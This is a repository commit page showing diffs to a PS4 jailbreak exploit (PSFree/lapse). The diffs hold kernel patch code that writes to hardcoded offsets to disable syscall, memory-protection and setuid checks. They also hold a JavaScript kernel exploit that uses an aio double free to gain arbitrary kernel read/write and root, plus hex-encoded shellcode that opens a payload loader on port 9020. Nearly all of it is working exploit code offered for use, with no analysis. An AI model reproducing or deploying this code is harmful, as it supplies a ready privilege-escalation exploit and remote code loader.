Seth/PSFree
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

revert + fix

Browse Source
This commit is contained in:
Nazky
2025-05-29 20:28:45 +02:00
parent ffd8a6ffff
commit bf59500edf
5 changed files with 114 additions and 207 deletions
Download Patch File Download Diff File Expand all files Collapse all files
kpatch/900.c
+43 -116
View File
@@ -16,7 +16,6 @@ You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */
#include <stddef.h>
#include <string.h>
#include "types.h"
#include "utils.h"
@@ -58,123 +57,51 @@ void do_patch(void) {
void * const kbase = (void *)rdmsr(0xC0000082) - off_fast_syscall;
disable_cr0_wp();
// patch amd64_syscall() to allow calling syscalls everywhere
// struct syscall_args sa; // initialized already
// u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
// int is_invalid_syscall = 0
//
// // check the calling code if it looks like one of the syscall stubs at a
// // libkernel library and check if the syscall number correponds to the
// // proper stub
// if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
// || sa.code != (u32)(code >> 0x10)
// ) {
// // patch this to " = 0" instead
// is_invalid_syscall = -1;
// }
write32(kbase, 0x490, 0);
// these code corresponds to the check that ensures that the caller's
// instruction pointer is inside the libkernel library's memory range
//
// // patch the check to always go to the "goto do_syscall;" line
// void *code = td->td_frame->tf_rip;
// if (libkernel->start <= code && code < libkernel->end
// && is_invalid_syscall == 0
// ) {
// goto do_syscall;
// }
//
// do_syscall:
// ...
// lea rsi, [rbp - 0x78]
// mov rdi, rbx
// mov rax, qword [rbp - 0x80]
// call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
//
// sy_call() is the function that will execute the requested syscall.
write16(kbase, 0x4b5, 0x9090);
write16(kbase, 0x4b9, 0x9090);
write8(kbase, 0x4c2, 0xeb);
// patch sys_mmap() to allow rwx mappings
// patch maximum cpu mem protection: 0x33 -> 0x37
// the ps4 added custom protections for their gpu memory accesses
// GPU X: 0x8 R: 0x10 W: 0x20
// that's why you see other bits set
// ref: https://cturt.github.io/ps4-2.html
write8(kbase, 0x16632a, 0x37);
write8(kbase, 0x16632d, 0x37);
// patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
//
// this check is skipped after the patch
//
// if ((new_prot & current->max_protection) != new_prot) {
// vm_map_unlock(map);
// return (KERN_PROTECTION_FAILURE);
// }
write32(kbase, 0x80b8d, 0);
// patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
// call ...
// mov r14, qword [rbp - 0xad0]
// cmp eax, 0x4000000
// jb ... ; patch jb to jmp
write8(kbase, 0x23B67F, 0xeb);
// patch called function to always return 0
//
// sys_dynlib_dlsym:
// ...
// mov edi, 0x10 ; 16
// call patched_function ; kernel_base + 0x951c0
// test eax, eax
// je ...
// mov rax, qword [rbp - 0xad8]
// ...
// patched_function: ; patch to "xor eax, eax; ret"
// push rbp
// mov rbp, rsp
// ...
write32(kbase, 0x221B40, 0xC3C03148);
// patch sys_setuid() to allow freely changing the effective user ID
// ; PRIV_CRED_SETUID = 50
// call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
// test eax, eax
// je ... ; patch je to jmp
write8(kbase, 0x1A06, 0xeb);
// patch sysveri to prevent delayed panics
write16(kbase, 0x626874, 0x9090);
// overwrite the entry of syscall 11 (unimplemented) in sysent
//
// struct args {
// u64 rdi;
// u64 rsi;
// u64 rdx;
// u64 rcx;
// u64 r8;
// u64 r9;
// };
//
// int sys_kexec(struct thread td, struct args *uap) {
// asm("jmp qword ptr [rsi]");
// }
// sysent[11]
//ChendoChap Patches For 900
const size_t KERNEL_enable_syscalls_1 = 0x490;
const size_t KERNEL_enable_syscalls_2 = 0x4B5;
const size_t KERNEL_enable_syscalls_3 = 0x4B9;
const size_t KERNEL_enable_syscalls_4 = 0x4C2;
const size_t KERNEL_mprotect = 0x80B8D;
const size_t KERNEL_prx = 0x23AEC4;
const size_t KERNEL_mmap_1 = 0x16632A;
const size_t KERNEL_mmap_2 = 0x16632D;
const size_t KERNEL_dlsym_1 = 0x23B67F;
const size_t KERNEL_dlsym_2 = 0x221b40;
const size_t KERNEL_setuid = 0x1A06;
const size_t KERNEL_bzero = 0x2713FD;
const size_t KERNEL_pagezero = 0x271441;
const size_t KERNEL_memcpy = 0x2714BD;
const size_t KERNEL_pagecopy = 0x271501;
const size_t KERNEL_copyin = 0x2716AD;
const size_t KERNEL_copyinstr = 0x271B5D;
const size_t KERNEL_copystr = 0x271C2D;
const size_t KERNEL_veriPatch = 0x626874;
const size_t KERNEL_setcr0_patch = 0x3ade3B;
write32(kbase, KERNEL_enable_syscalls_1, 0);
write16(kbase, KERNEL_enable_syscalls_2, 0x9090);
write16(kbase, KERNEL_enable_syscalls_3, 0x9090);
write8(kbase, KERNEL_enable_syscalls_4, 0xEB);
write8(kbase, KERNEL_mmap_1, 0x37);
write8(kbase, KERNEL_mmap_2, 0x37);
write32(kbase, KERNEL_mprotect, 0);
write8(kbase, KERNEL_dlsym_1, 0xEB);
write32(kbase, KERNEL_dlsym_2, 0xC3C03148);
write8(kbase, KERNEL_setuid, 0xEB);
write16(kbase, KERNEL_prx, 0xE990);
write8(kbase, KERNEL_bzero, 0xEB);
write8(kbase, KERNEL_pagezero, 0xEB);
write8(kbase, KERNEL_memcpy, 0xEB);
write8(kbase, KERNEL_pagecopy, 0xEB);
write8(kbase, KERNEL_copyin, 0xEB);
write8(kbase, KERNEL_copyinstr, 0xEB);
write8(kbase, KERNEL_copystr, 0xEB);
write16(kbase, KERNEL_veriPatch, 0x9090);
write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
const size_t offset_sysent_11 = 0x1100520;
// .sy_narg = 6
write32(kbase, offset_sysent_11, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]']
write32(kbase, offset_sysent_11, 2);
write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
// .sy_thrcnt = SY_THR_STATIC
write32(kbase, offset_sysent_11 + 0x2c, 1);
write32(kbase, offset_sysent_11 + 0x2c, 1);
enable_cr0_wp();
}
kpatch/900.elf
BIN
View File
Binary file not shown.
kpatch/900.o
BIN
View File
Binary file not shown.
lapse.mjs
Regular → Executable
+71 -89
View File
@@ -96,9 +96,6 @@ const CPU_LEVEL_WHICH = 3;
const CPU_WHICH_TID = 1;
// sys/mman.h
const PROT_READ = 1;
const PROT_WRITE = 2;
const PROT_EXEC = 4;
const MAP_SHARED = 1;
const MAP_FIXED = 0x10;
@@ -136,14 +133,14 @@ const main_core = 7;
const num_grooms = 0x200;
const num_handles = 0x100;
const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
const num_alias = 50; //TODO: check best value here for 9.xx
const num_alias = 10;
const num_races = 100;
const leak_len = 16;
const num_leaks = 5;
const num_clobbers = 8;
var nogc = [];
let chain = null;
var nogc = [];
async function init() {
await rop.init();
@@ -1461,17 +1458,17 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
die('pipe read failed');
}
log('achieved arbitrary kernel read/write');
// RESTORE: clean corrupt pointers
// pktopts.ip6po_rthdr = NULL
const off_ip6po_rthdr = is_ps4 ? 0x68 : 0x70;
const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
kmem.write64(r_rthdr_p, 0);
kmem.write64(w_rthdr_p, 0);
log('corrupt pointers cleaned');
// RESTORE: clean corrupt pointer
// pktopts.ip6po_rthdr = NULL
//ABC Patch
const off_ip6po_rthdr = 0x68;
const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
kmem.write64(r_rthdr_p, 0);
kmem.write64(w_rthdr_p, 0);
log('corrupt pointers cleaned');
/*
// REMOVE once restore kernel is ready for production
// increase the ref counts to prevent deallocation
@@ -1508,10 +1505,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
// sysent[661] is unimplemented so free for use
const offset_sysent_661 = 0x1107f00;
const sysent_661 = kbase.add(offset_sysent_661);
const sy_narg = kmem.read32(sysent_661);
const sy_call = kmem.read64(sysent_661.add(8));
const sy_thrcnt = kmem.read32(sysent_661.add(0x2c));
// .sy_narg = 6
kmem.write32(sysent_661, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -1601,14 +1594,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
log('setuid(0)');
sysi('setuid', 0);
log('kernel exploit succeeded!');
log('restore sys_aio_submit()');
kmem.write32(sysent_661, sy_narg);
// .sy_call = gadgets['jmp qword ptr [rsi]']
kmem.write64(sysent_661.add(8), sy_call);
// .sy_thrcnt = SY_THR_STATIC
kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
alert("kernel exploit succeeded!");
}
@@ -1631,6 +1616,20 @@ function setup(block_fd) {
}
aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
{
const reqs1 = make_reqs1(1);
const timo = new Word(1);
const id = new Word();
aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
chain.do_syscall_clear_errno(
'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
const err = chain.errno;
if (err !== 60) { // ETIMEDOUT
die(`SceAIO system not blocked. errno: ${err}`);
}
free_aios(id.addr, 1);
}
log('heap grooming');
// chosen to maximize the number of 0x80 malloc allocs per submission
const num_reqs = 3;
@@ -1643,6 +1642,48 @@ function setup(block_fd) {
return [block_id, groom_ids];
}
function runBinLoader() {
var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
var payload_loader = malloc32(0x1000);
var BLDR = payload_loader.backing;
BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
BLDR[60] = 0xC3050FCA;
chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
var pthread = malloc(0x10);
sysi('mlock', payload_buffer, 0x300000);
call_nze(
'pthread_create',
pthread,
0,
payload_loader,
payload_buffer
);
log('BinLoader is ready. Send a payload to port 9020 now');
}
// overview:
// * double free a aio_entry (resides at a 0x80 malloc zone)
// * type confuse a evf and a ip6_rthdr
@@ -1669,7 +1710,7 @@ export async function kexploit() {
if (sysi('setuid', 0) == 0) {
log("Not running kexploit again.");
runBinLoader();
return new Promise(() => {});
return;
}
}
catch (e) {}
@@ -1749,67 +1790,6 @@ export async function kexploit() {
}
}
function runBinLoader() {
/* BinLoader by ps3120 */
var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
var payload_loader = malloc32(0x1000);
var BLDR = payload_loader.backing;
BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
BLDR[60] = 0xC3050FCA;
chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
var pthread = malloc(0x10);
sysi('mlock', payload_buffer, 0x300000);
call_nze(
'pthread_create',
pthread,
0,
payload_loader,
payload_buffer
);
log('BinLoader is ready. Send a payload to port 9020 now');
}
//For some reason this payload loader version does KP.
/*kexploit().then(() => {
var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
var payload_loader = new View4(window.pld);
chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
const ctx = new Buffer(0x10);
const pthread = new Pointer();
pthread.ctx = ctx;
call_nze(
'pthread_create',
pthread.addr,
0,
payload_loader.addr,
payload_buffer,
);
})*/
function malloc(sz) {
var backing = new Uint8Array(0x10000 + sz);
@@ -1827,7 +1807,9 @@ function malloc32(sz) {
return ptr;
}
kexploit().then(() => {
window.pld_size = new Int(0x26200000, 0x9);
var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
payload.js
-2
View File
@@ -1,7 +1,6 @@
if (sessionStorage.getItem('jbsuccess')) {
sessionStorage.setItem('binloader', 1);
} else {
sessionStorage.removeItem('binloader');
fetch('./payload.bin').then(res => {
res.arrayBuffer().then(arr => {
window.pld = new Uint32Array(arr);
@@ -9,4 +8,3 @@ if (sessionStorage.getItem('jbsuccess')) {
})
})
}